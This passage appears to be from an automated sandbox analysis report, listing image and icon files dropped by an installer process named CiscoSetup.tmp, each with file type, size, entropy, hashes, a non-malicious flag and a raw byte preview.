                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0468421318534369
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:rlL14RyS5lhJEO7dVVvydaS+Qu7lfTllv7l3Jl//lHNlP4lp4lX4lR4lf4l54lng:xh4r3rEOKJmfGJ5
                                                                                                                                                                                                  MD5:223CC34A3299A5777171F41DF8453CDD
                                                                                                                                                                                                  SHA1:559AA03C2FB5D602B4116C16A7D73EE81C99F37B
                                                                                                                                                                                                  SHA-256:7E62C5A39DCDD0DFB69F1CCC882579D71DFD4DD345828318F1170AC48ED7F934
                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2274
                                                                                                                                                                                                  Entropy (8bit):7.88487369762579
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:ANENb8K8isarhoHup4l7Hn5MPuvW5LApZJ+WoXY:Bbx3rGHupubC6NpzSXY
                                                                                                                                                                                                  MD5:02AA7BFBC5519A9410E0D27732A6A163
                                                                                                                                                                                                  SHA1:9DDE546C6090CA4BD8BE58F8625A6AE25D440E6E
                                                                                                                                                                                                  SHA-256:B08A8AE17D62E9CF9D6E91E59955AF91E1B126FD82BC1071BDAFEE8AB6818253
                                                                                                                                                                                                  SHA-512:323777E1ABC44F643AD6AE581970D551D6BB94DF485377E91DB411ED8B839C47F8490002DF9756AD340BC19D8676050A620A1008F211B3AC32C39BE37CD35093
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx...LUe....]i...%L.......^....#.J[6...[.Q.....2.0.p...sT...o.c.n..dE[N/E.9..H..k.....{..s.....wc.{.=?..}..}..}.3....jK#.d"......&"......ug.|b......".&.,"J..[.x..&.J$s....]=t..*........TMDU.G.5=._.@&...........c[|V..v...|3..3.......,...`vp0.@.H...e.`V..`]..g.^sN........ o0..-.gQFz........J..+j.*h@&...T@D...k.zwl1Z.t.......r.U.. n5..5p..{..f1r.E.=P"\..6.jM..2Ym.....u.V..=[)&:*."i...^.{.(U.:C.V..uMjo........N.DG..9.......?.4,....)cy*..H5?]..s..5.lm.w:TAR...)M...YV.GK...<.....|.".p.%.....f.u5............Rr..y.}..DL*Sr.".z...w....n..d...8B.@...xmU.4+...J.n............(KQ~...,.L....>..LV..9....[..../.G.T..(..>4(7...xGw........h.....X.....{..V-@B.../..y..1..W.d. nn...&....~...*S`....k...@k{.w.dP-.n....Z.(...=.:...N..#\......-~......0..;...K. .'....;..|J.n.d.t...A_O)d..g r...w-...e........@5.d.v...........e.y-....3\.......H..[.g.roI.=.(B...\.d.....jh..K..S.].......Xf...jC....ol...2
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:MSsuOJ3aklIveNn3uRjOIi4d6R2LA+KdrIF0Nl3BqL7goSlO2Ywdq8XLxTGO:MD35lIvmnsT8gA+GsFvkoSVdxl
                                                                                                                                                                                                  MD5:2A93A2F714FAB48B6CD5BDF1533EEFE2
                                                                                                                                                                                                  SHA1:727D59B41389E63AD6149117E83035CE8DECD59D
                                                                                                                                                                                                  SHA-256:7982204EE803716D70B99C224A4A1F3AA10CA0AC012CF33802A3E305B72AB8AF
                                                                                                                                                                                                  SHA-512:B4F04174C5B0691F65C4304B5EFC23C5533FF72092F15C03EDBBFBA103158C79FD0F890A7509EF84D85CD662AA849525FDAE1BE9D91016214BF5B1262EA735B3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v...XIDATx..=R.X..{w.l8..8#..-...f.'.9...lhs.)...N`q...!...=.I7.zz-F.H..7._.U.3#.^.[..Z..(..(..(..(..l).e}YE9.....U.[qy..W)Ei....GP-*A...=G......b....R\..R.h..}.]W.>T...Pt.j).Vp.,...*..y1c.......jx...W(Zr....xv.|9..%....$g5.Z.'$.r .......7r..b.y.P.....1.(.)V..P-.Q.._)k..1.t.._....W.R.o...O.d.n................Cl....r.E...m..P...6..,.[!],.m...]..Y-v..6.j.p\c.g.2u...-Bs......k{........^V....e.F...N.u..=.Hw..1..&.....y^..i].E.B ..{.}.....n0w......1.ES..m....p.....R.Q._......gF.Gp.#..v..<~.;t.Xr.nx.bs.K.s.c..<.j#Qf.6k....x..{.....}.?;uS..{.y...y....<..9Q.c"..I;....;^N...n% .O....<.V..;......G..+E....h-....M.T-....."V..G[...S..~r...-.L"f%0@.1.Zx....0 .]d1+.Az.~.b...d.......b....Z*.......k.YZ.m.q....WX....0..G.T......]....s,.obV7..D.7h.2r..g..(<J....+..(V..*.y[.!f..Z..>..".I..t....ab.v....M9...)..U.h..M#.....JA/.VP.>......wB.......^1.....d..R..9Orm-.....R.C..%..(...d...J9#6...{TpXJp....j
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13727
                                                                                                                                                                                                  Entropy (8bit):7.982847912604664
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:63aRGz9MobH6FYdTA1tjCtZPXq5Sc5Li2H2E:v29jH6FJ1YnyLii2E
                                                                                                                                                                                                  MD5:2DDF6BB80F9B33B219E448F37ED394C0
                                                                                                                                                                                                  SHA1:BD1D1397D9011D9CF81D1061095CEA39C81AEE56
                                                                                                                                                                                                  SHA-256:8CB70AAF7D9D0C98AF0E6C640A78A2D4CABA2DC3DA8876208AD9A617A6E7A226
                                                                                                                                                                                                  SHA-512:00E86EDC454CF26E50D8AEEDF2CBC031E79F609E280E27FA87381CE6C7F9F6A8611FFC6EB1075BE271F0E864EDAAE89FDB25502BCB34C66412B6504C370154CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..].t...7h....k..B..S......5Q.O.l..-D.....K....*j.X.T.....T.....66..D,X.B..J..@...}...3.s...{.|k...?3sf.>..oJ..^..-(.BDk..o.<........... =......"......\..{.....q..-(N.T...UZ.y.'p"..=Y.Ip.....K.^.:Q........E.wp..+.$..3..*]...0.J.....)_......*x...\M...1..$:.{B....0..e..]0..Z.Y.]...D'...k...p~....3D_.O,;..O..../5....#h..?./?8..[....7..#.....f.4*?e..}..j|e.......'.....d.N...b./...D...p...h]._S>9D.~..M.M.....M.|.@.-.Rr.$..k6.....2..7..v.L.?.Vb=...tl(...1x.._.....fJ$.C.......go...6.c....m.^.N.L&.....}/.j.})_......[.\...k5.....{EK...."......m...G.:.D...\w.q;.p.*%`.}..g.x.D/.c............HE%".d..?..'...DB.......U...<....k....y..N...8...f=..5. ....qO.[P.GD;.h......y...b..... .TT..}..:....M.l....w.wG.h.3....S........O..M...;.wF.p..xCt..T.I.2y)v.Ip6....`....H..V...mi...?a.F.Z2.(%....S...y.W..A.$.}N..(.....m.I..7e.....dr..=..n.7.-....I........L..5y........->1.".R.x.......n.^...Go.9~.!.-....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:IhgOYUbtU91yZQm0IZ5GE1njVNMooVREvukNGEsuiaoYOyF40:IhaUpU91ScIZ5PjVNaREvpjiao4+0
                                                                                                                                                                                                  MD5:D1F876BC1C789A4108570185251B864E
                                                                                                                                                                                                  SHA1:9F91D3B837191A9499CD2959EC1802CF444D78AE
                                                                                                                                                                                                  SHA-256:DF137D0086B1A5DC1A0508643AB8DBE66A0A268A2A5E7A539EDF39F6957AF1AB
                                                                                                                                                                                                  SHA-512:4E1D5AE2D6539B38EDEFEC017B41DD50D7EA41AEF9B6783538D8D19D9C14E2D9411D2DF86AC672BD6B171A507F77EF2D4976003206DC4624687BA4588BAA6688
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......pHYs...#...#.x.?v.. .IDATx....U..G!o.<.........Mi@...t+iV@[H.X..-MZ...6E.lZ...X.>%jW..&..]-P.JV.<..Z...Rt..@M.mM7...9sg..;s.{....s.3....o~.H...w.......-...-.<.......4.5.y..d'....7......b..{.....]7..?u......}5y...M.k...`..U.w.............>.}...h..s.... ....Gu!....[tc ;....F...v...k.{.x.'U..;..-..'...B.Y....I...R..0Zw...`u.C...|].....m...y...V.I..?.L.;.8.....Ez&\h.'y.........;...-...G.y/9*....}...S.@..+._..*..a.9WZ...._W+-.B.>.m..:....o..*\...<Mu`.a.........o..w.]@=/_|9Y..~....b...>.dk..4VY...5...v+r"...qw....sm..&.]."y.x..I...kt!fw..Xx.....\.,}.=.gH..AgA..xV.\t..".0.(...8a\.QJ..k..Hu.*.........E..l/...4=x.54l..$j.k3M.../.l|r.=...K.Rt.Z..........N....v...z..S...1^..u...P..j.BF.W...iH.....n).....=.s8...!bx.N<.\]....,.6..`..b~8...[..X..o..R.X.`!BiZ.0...t.im..o....n...s...|W..<....K.by..o..l......{.KMe.....g.n5..b+w.B.Ilo...M?.V:X...!..&.KJ...?...Lj......._.~...l.}...=..HO.@?!d_.O.Vy.....QI=..b4...8t
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4732129504366194
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:h6QRIHYm77Z5IVpIHwuS0g72HR1K9TEYkbGg2o:iHY0TUuUSHRAQXHx
                                                                                                                                                                                                  MD5:E61CF737A35E8DB52178528A0CBFE702
                                                                                                                                                                                                  SHA1:DE0A794D67A3DEF7079CEC7C48AC580CC71A7270
                                                                                                                                                                                                  SHA-256:559C518DC1F316C4991DC95D131CAB0BDAC445B1CE41B28EC8244CDD78F8AB2F
                                                                                                                                                                                                  SHA-512:8563013E9A2B75F5EDF00D71A292634FE375D5F6670F7F303C2CAB2DC271FDFC04A760417E2D487269D26611F6D236E6164EFC3179452AB34B1D42ABC17C51B6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ............................................................................P...........................@.......................................................................................`...................................................@...................................................................@................z]J.X5..M'..M'..M'..M'..X5...kY....................0.................................................................xh.M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..M'..X5.................p........................................................X5..M'..M'..z]J.................................X5..M'..M'..X5...........................................................xh.M'..M'..z]J.............................................M'..M'..M'..M'...................................................xh.M'..M'......................................................M'..M'..z]J.M'..M'.............p.......................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                  Entropy (8bit):7.848629133083243
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:gySVFiuSZgKTkBsSS/Z89Vn1MM1DCINukyd5Wb:gySBSZCqBhen1MM1CINgsb
                                                                                                                                                                                                  MD5:85D427479A5F8E6F69DEB0A5EC7E6DBF
                                                                                                                                                                                                  SHA1:95414451D6AE9B130831A1C297151F65AD849A6C
                                                                                                                                                                                                  SHA-256:CF8B60054D290DFA6BA59086BF18F5ED0718C721B4ADD200AC95275E5457AB58
                                                                                                                                                                                                  SHA-512:58248F232F27441ACB81B0A6AF2272D19EE1710101C3675CCAEA4BA3CE8A74D664053C58EF2D9C948F2ABCCA4F30B5ACF633A2EA53C8E260BB40FA6F1214151C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]+s#G..K..N0P..Nf)..0... ..v......l...P*.{(.2R.Yf...*,a.U.d....3.....g.,..~N..$$$$$$$$$$$$$$$$$H..^.b6h.@W}.?.V?oc..O.....x^_...lR.A.......=[,.zX}..S.^..y...8!.@..4...i.5..l...sEHl..p........D.HA2..K.)....:...l.Ud.k.........:........p..Re.J...U.Y..9(.>...%....a..e..V........D.:J.eL..GJ6.P.....3B.kG...wgCP).?.5qH....85|.tel.q..W..=..[.u.....w.3r..k.....RR.B....$....]*.}../.@.71.s0b.bNH4=m.l.^I..`.".. 2...X...^......U..s.!d........~..;..J.f..,)..T..V3+.g%.T.G.b..K.r..=.GF...GT5.s..N.l..:.$..,!.T.......r$>.H..1...Q..}.~&..z.:.iF.}@b..mP.....!B...e..R...A(....U.#..o5&a.43..."]".._..m.......7.G..w.5q&..V.............,.+)\.;.0zw.Th....;.!..^J..-...:L.L.iM..g..Zgq.N8.qhYd.?.7...=t.iL[..B........yi..L...q8w..>..x..p.O..VY.u.s....%A.....`...*.n..L.f...6_."..R.D...8..^...>.N.J.1.;.T....-...}~.M..J.:...B..{m.L.m...>.J;.\T.=).xQ..u{...f........!.)y]lck..W^.v.T.ms...%^..,.b..]ZZ...u.^...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2531
                                                                                                                                                                                                  Entropy (8bit):7.8827223365027725
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:PajMqdGnKe/dujhrZicEFhViZIs2sJ69y+10zTECChhrHxgpj:PaIqcnKeKZHg7by+ezTLUhrR+j
                                                                                                                                                                                                  MD5:2EA165B23D882176DAAD7C368EE24642
                                                                                                                                                                                                  SHA1:A46B746D76A41D4B322552BE4D66E9FAC66D7C19
                                                                                                                                                                                                  SHA-256:5B0F218A1EDB9CE79C15E8278557CCDB8AF44EAD52B4149CBC27DEF6FFE38619
                                                                                                                                                                                                  SHA-512:7C6C1F9FBDB726AF81551CB2CB790B847904E10AB90923A8FA43C34D617FD4A7F4B0A6FC85D327FA140D8C42197213F2A2BBB4643C16A1FC7DF17C1AF1E674FC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\ol.E....)....{.*i#.A .lbi..~.E.......M!..E.M..m.......L../=...TJ...4..@9.....O.E...fz.{..3.G5.%....y.y.....=.a..e.D4.....|.C7....3x..w.....NP(ZVHD5DTMD....sg....E.......+..........ImD.:...3...BP(Z....).(.4A..`.....l..AT.....K@..$Y.~..+A..5...H.\4..V/.Z.'.]{..P.."._...'Q..d%.....j.\...."..E..nS..+Q....e0.."*.1o...-....d{."..i.`.....$.......q...i...Q.6.R...V.j..A.h...>h..'.....)?/.@$.q..u.y'.....6-..wv{.Q../..e/..7.y..wl~.^....;6tWHp..TY..JK..........G/...{"..A.....E9...i..~.....Z@.....zs..t.&;.=..M..C....3)7..z.m.|.'.N.{iiP&.9...m=....L.....ar5.O...&e.} S..~j......>....8..=0v. ..f).#....UC...9..Q....}h8I.R.HI..s....F.6.....v..O^.EhSP.,R&!....N.. ....{...s..$L.....I2... ........C.......Dt........2BV).0.#H.[....@..M.jO:....(S/.v.f.A..bo.t....|M..Z.2BVijk..'.$...n...BP.r..<@KB*.R.....A..6..2.d...:..Y5..F..0...b.;.D....p...=..;v.hgK..o.Iu.... ..R.U.....c...9....xi.TW..`.....~...N.".A...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:f/oVoAjsba3qfpgr/jKyV8xonTTdZPNE/ZIeb4p82Xg:fwZ6tyHTTdERbkp8Mg
                                                                                                                                                                                                  MD5:DDF9FC987801BDE753D2C37733DE7F3D
                                                                                                                                                                                                  SHA1:BDA65E600F5EDD2889244E2C1CEAD37C1C292FC8
                                                                                                                                                                                                  SHA-256:D62A61171CAAD9B43DBCE2683DB87959B2C1FCB303D6B34A3DC1D178A9745F44
                                                                                                                                                                                                  SHA-512:D1C0451C3E9B52920A56EDF57CCF3617662E18B14E0E0B00A94D948574431C30E1C31BA2FF6F4BBFA8E01D42B00EA90FD03CD1D3991B3ACF04C5C9802F547244
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx.._h].....Er..uQh..T2...E#.0m.....d...i/2.%2..L....N....L;.....%>..g.-.!...ER!&.j9..y..2.u.....x ..w.Y;.^{......~@..K{....~......,.!6....._.>(../........../~....FO.!....d.a.9thp..^.'t=...4>d.%....x.=....Z;.e.....=.^...6'....;88....o..k?....{.....ir2j..&'..:'fqqQ\.x...{2*..~./^..z.....5q..J.....!.~..q..N..0..+....z2...'!K..rH.&ET..^......4vY.;[.......b.q+d.].te,//.s".<.{.....\.+.le.^......+$.u....PO..v|./.he....O.J.......=H.....7cy..q......Y.k]......N......g#.I....M..?.........."{.dO...^.k..U....NH.qg....X..#.5|..E....7r..}.NF..4..J...w~.._....E.".Qu.:.E...{..l...U(..D..P...d..K.z.h..%/^.w\;.N..d...|.Q...X....2=.......W.......eR.X..~....;.Uo.w.....3....#.....7'.....q......f...D$$'ck..'P.G.y..v..!......A..T....*..w...F.U...OF].............V....*..biU$4>.U..y..OvB%=.S....B..b.DLM....WyQl..:c.a.D..o.6.\&kkk^.....Pm....=....kZ...~.*.u2.Qjr....lL..q...km.b|......>...E
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+9/hYGSEklnePwwDIr4LcARtTmOj/FrzFkT7goo:+9/CGShEPJcX87v
                                                                                                                                                                                                  MD5:393317DEF43F554C69A8ED63065E5BBE
                                                                                                                                                                                                  SHA1:09185B8B3C21C5CFB6661958665B6D997BF64E6F
                                                                                                                                                                                                  SHA-256:92ACFDA492B05FAA52BD32E9581F028BEE55F1C5AF617ACD8EE9E6985C9D1CBD
                                                                                                                                                                                                  SHA-512:9C7B0D37DA9080F27F0116F0C45AA5CD2D9480955433D60CCEE1555C0D930081655705C65565C7C18B766458530FA5B8DD641E7D2F8776BBB8650B7D3A95351C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................@................................IA.P..s...s...s...s...s...s...s@............................................................................................b[....y.&...,...0 ..0 ..,...&.....y...s...s......................................................xh.cB+.M'..M'..M'..M'..J&..$.`.".../...0 ..0 ..0 ..0 ..0 ..0 ../...".....s...s.........................................z]J.M'..M'..M'..M'..z]J.z]J.z]J.+.S."...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..".....s........................0..........w.M'..M'..X5...xh.......................y./...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ../.....y...s@........................z]J.M'..M'...xh.........................qj..&...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..&.....s.....................z]J.M'..X5.................................8/..,...0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..0 ..,.....s...................w.M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
